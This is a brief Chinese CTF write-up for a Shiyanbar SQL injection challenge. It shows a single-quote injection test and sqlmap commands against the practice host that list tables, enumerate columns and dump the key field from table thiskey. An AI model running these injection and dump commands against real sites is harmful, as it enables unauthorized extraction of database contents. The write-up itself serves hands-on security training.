这个看起来有点简单!--实验吧

这个看起来有点简单!


手工检测是否存在sql注入(经典id=1'加入单引号提交,结果:如果出现错误提示,则该网站可能就存在注入漏洞)
使用sqlmap爆出当前数据库my_db 发现可能藏有key值的thiskey表 进一步爆出字段k0y并得到key值。

查看手册sql map
python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump

python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables
python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns --hex



这个看起来有点简单!--实验吧_第1张图片

这个看起来有点简单!--实验吧_第2张图片

这个看起来有点简单!--实验吧_第3张图片

这个看起来有点简单!--实验吧_第4张图片
这个看起来有点简单!--实验吧_第5张图片

你可能感兴趣的:(这个看起来有点简单!--实验吧)